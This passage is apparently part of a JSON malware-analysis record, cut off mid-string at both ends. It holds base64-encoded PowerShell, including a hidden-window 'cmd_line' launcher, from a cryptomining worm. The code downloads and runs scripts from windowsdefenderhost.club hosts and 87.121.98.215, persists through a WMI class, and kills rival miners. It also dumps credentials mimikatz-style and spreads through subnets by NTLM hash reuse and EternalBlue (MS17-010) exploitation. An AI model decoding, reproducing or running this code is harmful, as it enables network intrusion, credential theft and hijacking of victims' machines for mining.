AAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKA